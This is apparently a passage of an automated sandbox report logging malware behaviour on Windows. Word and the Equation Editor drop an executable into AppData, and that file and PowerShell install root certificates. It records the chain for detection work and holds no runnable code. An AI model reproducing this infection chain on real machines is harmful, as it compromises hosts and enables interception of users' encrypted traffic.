                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\qHbynE8Vgwabsy3[1].exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
